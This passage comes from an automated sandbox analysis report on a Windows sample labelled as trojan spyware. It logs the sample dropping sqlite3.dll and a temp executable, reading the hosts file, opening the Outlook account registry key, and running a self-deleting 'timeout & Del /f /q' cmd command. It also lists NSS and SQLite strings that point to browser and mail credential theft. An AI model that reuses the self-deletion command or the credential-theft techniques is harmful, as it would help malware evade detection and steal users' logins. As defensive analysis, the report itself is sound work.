                      Source: Tk6dsSEyOC.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\Tk6dsSEyOC.exe "C:\Users\user\Desktop\Tk6dsSEyOC.exe"
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\user\Desktop\Tk6dsSEyOC.exe"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /T 10 /NOBREAK
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\user\Desktop\Tk6dsSEyOC.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /T 10 /NOBREAK Jump to behavior
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile created: C:\Users\user\AppData\LocalLow\sqlite3.dllJump to behavior
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile created: C:\Users\user\AppData\Local\Temp\KVOjaLhCnJ.exeJump to behavior
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/68@1/8
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeCode function: 0_2_004279D5 CoCreateInstance,StrStrIW,CoTaskMemFree,CoTaskMemFree,0_2_004279D5
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile read: C:\Program Files (x86)\desktop.iniJump to behavior
                      Source: softokn3.dll.0.drBinary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
                      Source: Tk6dsSEyOC.exe, 00000000.00000002.482886651.000000006EEB0000.00000002.00020000.sdmp, sqlite3.dll.0.dr, nss3.dll.0.drBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                      Source: softokn3.dll.0.drBinary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
                      Source: softokn3.dll.0.drBinary or memory string: SELECT ALL * FROM %s LIMIT 0;
                      Source: Tk6dsSEyOC.exe, 00000000.00000002.482886651.000000006EEB0000.00000002.00020000.sdmp, sqlite3.dll.0.dr, nss3.dll.0.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                      Source: Tk6dsSEyOC.exe, 00000000.00000002.482886651.000000006EEB0000.00000002.00020000.sdmp, nss3.dll.0.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);docid INTEGER PRIMARY KEY%z, 'c%d%q'%z, langidCREATE TABLE %Q.'%q_content'(%s)CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);<
                      Source: Tk6dsSEyOC.exe, 00000000.00000002.482886651.000000006EEB0000.00000002.00020000.sdmp, sqlite3.dll.0.dr, nss3.dll.0.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                      Source: Tk6dsSEyOC.exe, 00000000.00000002.482886651.000000006EEB0000.00000002.00020000.sdmp, sqlite3.dll.0.dr, nss3.dll.0.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                      Source: softokn3.dll.0.drBinary or memory string: UPDATE %s SET %s WHERE id=$ID;
                      Source: softokn3.dll.0.drBinary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
                      Source: softokn3.dll.0.drBinary or memory string: SELECT ALL id FROM %s WHERE %s;
                      Source: softokn3.dll.0.drBinary or memory string: SELECT ALL id FROM %s;
                      Source: softokn3.dll.0.drBinary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
                      Source: sqlite3.dll.0.drBinary or memory string: UPDATE %Q.%s SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                      Source: softokn3.dll.0.drBinary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
                      Source: Tk6dsSEyOC.exe, 00000000.00000002.482886651.000000006EEB0000.00000002.00020000.sdmp, nss3.dll.0.drBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                      Source: Tk6dsSEyOC.exe, 00000000.00000002.482886651.000000006EEB0000.00000002.00020000.sdmp, nss3.dll.0.drBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                      Source: Tk6dsSEyOC.exe, 00000000.00000002.482886651.000000006EEB0000.00000002.00020000.sdmp, sqlite3.dll.0.dr, nss3.dll.0.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                      Source: Tk6dsSEyOC.exe, 00000000.00000002.482886651.000000006EEB0000.00000002.00020000.sdmp, nss3.dll.0.drBinary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);
                      Source: Tk6dsSEyOC.exe, 00000000.00000002.482886651.000000006EEB0000.00000002.00020000.sdmp, nss3.dll.0.drBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                      Source: softokn3.dll.0.drBinary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
                      Source: Tk6dsSEyOC.exe, 00000000.00000002.482886651.000000006EEB0000.00000002.00020000.sdmp, nss3.dll.0.drBinary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);/overflow%s%.3x+%.6x%s%.3x/internalleafcorruptedno such schema: %sSELECT 'sqlite_master' AS name, 1 AS rootpage, 'table' AS type UNION ALL SELECT name, rootpage, type FROM "%w".%s WHERE rootpage!=0 ORDER BY namedbstat2018-01-22 18:45:57 0c55d179733b46d8d0ba4d88e01a25e10677046ee3da1d5b1581e86726f2171d:
                      Source: sqlite3.dll.0.drBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4560:120:WilError_01
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeMutant created: \Sessions\1\BaseNamedObjects\useriZ5i-O1fR-8gT0
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeCommand line argument: NaF0_2_004660A0
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account ManagerJump to behavior
                      Source: C:\Users\user\Desktop\Tk6dsSEyOC.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                      Source: Tk6dsSEyOC.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: Tk6dsSEyOC.exe, 00000000.00000003.374795304.000000004BC6B000.00000004.00000010.sdmp, Tk6dsSEyOC.exe, 00000000.00000003.427942523.000000004BC71000.00000004.00000010.sdmp, freebl3.dll.0.dr
                      Source: Binary string: C:\bixorotuma_wufeyeyur\loyopuwudi-xovozoko\muba.pdb source: Tk6dsSEyOC.exe
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\gfx\angle\targets\libEGL\libEGL.pdb source: libEGL.dll.0.dr
                      Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: api-ms-win-crt-locale-l1-1-0.dll.0.dr
                      Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: api-ms-win-crt-runtime-l1-1-0.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libprldap\prldap60.pdb source: prldap60.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\interfaces\ia2\IA2Marshal.pdb source: IA2Marshal.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss3.pdb source: Tk6dsSEyOC.exe, 00000000.00000002.482886651.000000006EEB0000.00000002.00020000.sdmp, nss3.dll.0.dr
                      Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: api-ms-win-core-file-l1-2-0.dll.0.dr
                      Source: Binary string: ucrtbase.pdb source: ucrtbase.dll.0.dr
                      Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: Tk6dsSEyOC.exe, 00000000.00000003.427951428.000000004BC7E000.00000004.00000010.sdmp, Tk6dsSEyOC.exe, 00000000.00000002.481321705.000000004BC7E000.00000004.00000010.sdmp, api-ms-win-core-memory-l1-1-0.dll.0.dr
                      Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: api-ms-win-core-sysinfo-l1-1-0.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\ldap\c-sdk\libraries\libldap\ldap60.pdb source: Tk6dsSEyOC.exe, 00000000.00000003.378196371.000000004BC7F000.00000004.00000010.sdmp, ldap60.dll.0.dr
                      Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: api-ms-win-crt-filesystem-l1-1-0.dll.0.dr
                      Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: api-ms-win-crt-stdio-l1-1-0.dll.0.dr
                      Source: Binary string: C:\bixorotuma_wufeyeyur\loyopuwudi-xovozoko\muba.pdb0= source: Tk6dsSEyOC.exe
                      Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: api-ms-win-core-heap-l1-1-0.dll.0.dr
                      Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: api-ms-win-core-util-l1-1-0.dll.0.dr
                      Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: api-ms-win-core-synch-l1-1-0.dll.0.dr
                      Source: Binary string: vcruntime140.i386.pdbGCTL source: vcruntime140.dll.0.dr
                      Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: api-ms-win-crt-environment-l1-1-0.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: softokn3.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\ckfw\builtins\builtins_nssckbi\nssckbi.pdb source: nssckbi.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\mozglue\build\mozglue.pdb22! source: Tk6dsSEyOC.exe, 00000000.00000002.483423544.000000006FD89000.00000002.00020000.sdmp, mozglue.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: Tk6dsSEyOC.exe, 00000000.00000003.374795304.000000004BC6B000.00000004.00000010.sdmp, Tk6dsSEyOC.exe, 00000000.00000003.427942523.000000004BC71000.00000004.00000010.sdmp, freebl3.dll.0.dr
                      Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: api-ms-win-core-processthreads-l1-1-0.dll.0.dr
                      Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: api-ms-win-crt-private-l1-1-0.dll.0.dr
                      Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: api-ms-win-crt-convert-l1-1-0.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\accessible\ipc\win\handler\AccessibleHandler.pdb source: AccessibleHandler.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: nssdbm3.dll.0.dr
                      Source: Binary string: msvcp140.i386.pdb source: msvcp140.dll.0.dr
                      Source: Binary string: z:\task_1552562425\build\src\obj-thunderbird\comm\mailnews\mapi\mapihook\build\MapiProxy.pdb source: MapiProxy.dll.0.dr, MapiProxy_InUse.dll.0.dr
                      Source: